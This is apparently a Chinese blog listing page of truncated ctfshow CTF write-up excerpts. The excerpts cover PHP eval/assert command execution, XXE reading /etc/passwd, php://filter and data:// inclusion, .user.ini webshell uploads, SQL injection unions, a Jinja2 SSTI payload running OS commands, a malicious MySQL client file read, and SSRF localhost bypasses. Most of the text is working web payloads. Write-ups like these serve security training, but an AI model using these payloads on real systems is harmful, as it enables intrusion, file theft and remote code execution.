灰太的表格的博客

web569web570/index.php/Home/ctfshow/assert/eval($_GET[1])/?1=system("tac%20/f*");闭包路由：参考官方文档或博客web571给了源码，找到一处可以进行传参的控制器,传个参数在这，打个断点调下：接着跟进去：接着跟进：我们最开始传的参数在content变量里，跟进到if(这里有个对于当前使用的一个模板的判断，由于不知道题目使用的是哪种所以我就用0,1了图方便)：往下走：成功找到后门，conten

baby_captcha点击无脑，会给一个字典。爆破admin firectfshowcmsindex.php里有个包含/install/index.php里是个重新安装的操作，但是有锁。这里可以用存在include的界面将这个页面包含进来。再进行重新安装。这段代码有个连接数据库的操作，我们可以用这点来构造一个恶意的mysql客户端来进行任意文件读取。原理看这：https://www.modb.pro/db/51823主要这个：恶意脚本：https://github.com/Moro

(睡了一下午打算，通宵学习hhhh)web373wa1ki0g标签可以随便改，ctfshow这个不可以。!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><wa1ki0g><ctfshow>&xxe;</ctfshow></wa1ki0g>

web254?username=xxxxxx&password=xxxxxxweb255GET /?username=xxxxxx&password=xxxxxx HTTP/1.1Host: d66c6632-05e8-4703-9bac-14213020568d.challenge.ctf.show:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/8

web89intval():成功时返回 var 的 integer 值，失败时返回 0。 空的 array 返回 0，非空的 array 返回 1。preg_match传数组返回为falsepayload:?num[]=aweb90?num=0x117cweb91Apache HTTPD 换行解析漏洞(CVE-2017-15715)正则表达式中的 $与^apache这次解析漏洞的根本原因就是这个 $，正则表达式中，我们都知道$用来匹配字符串结尾位置，我们来看看菜鸟教程中对正则表达符$的

web151-152.png后缀上传，抓包改成php结尾。web153刚开始想了一种绕低版安全狗的做法上传成功但是访问不到，后来找了师傅问才知道预期解是绕过前端认证上传个.user.ini文件内容是auto_prepend_file = 1.png，再上传个写了shell的png文件，在访问下index.php就可以（auto_append_file和auto_prepend_file一个相当于在每个php文件尾加上 include(“xxxx”)，一个相当于文件头加上 include(“

web21抓包，看有个头是base64账户密码之后的，对其爆破即可web22爆破子域名web23别人写的脚本，我不是这么做的。<?phperror_reporting(0);$string = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';print (strlen($string)."\n");for ($a = 0; $a < 62; $a++) { for ($b = 0; $

web78?file=php://filter/convert.base64-encode/resource=flag.phpweb79(php5.2.0起，数据流封装器开始有效，主要用于数据流的读取。如果传入的数据是PHP代码，就会执行代码使用方法:data://text/plain;base64,xxxx(base64编码后的数据))php被过滤使用data伪装协议执行代码?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxh

171order by 判断下再union select联合查询下，数据库，表，列，字段flag在password字段里-1’ union select 1,2,password from ctfshow_user --+172与171一样，多加了个表少了个列而已-1’ union select username,password from ctfshow_user2 --+173同上1’ union select id,username,password from ctfshow_us

361没发现什么过滤,直接用burp跑了下最后payload:{{().__class__.__bases__[0].__subclasses__()[80].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}362同361payload

CTFSHOWSSRF 351-360351url=file:var/www/html/flag.php直接读取就好352url=http://127.1.1.1:80/flag.php 过滤了locahost和127.0.0.1.服务器要是linux的话用零也可以绕过。353url=http://0x7F.0.0.1/flag.php，直接转个进制绕下354url=http://域名/flag.php 用自己的域名解析多加个127.0.0.1，自己没的话去ceye.io注册再绑定127.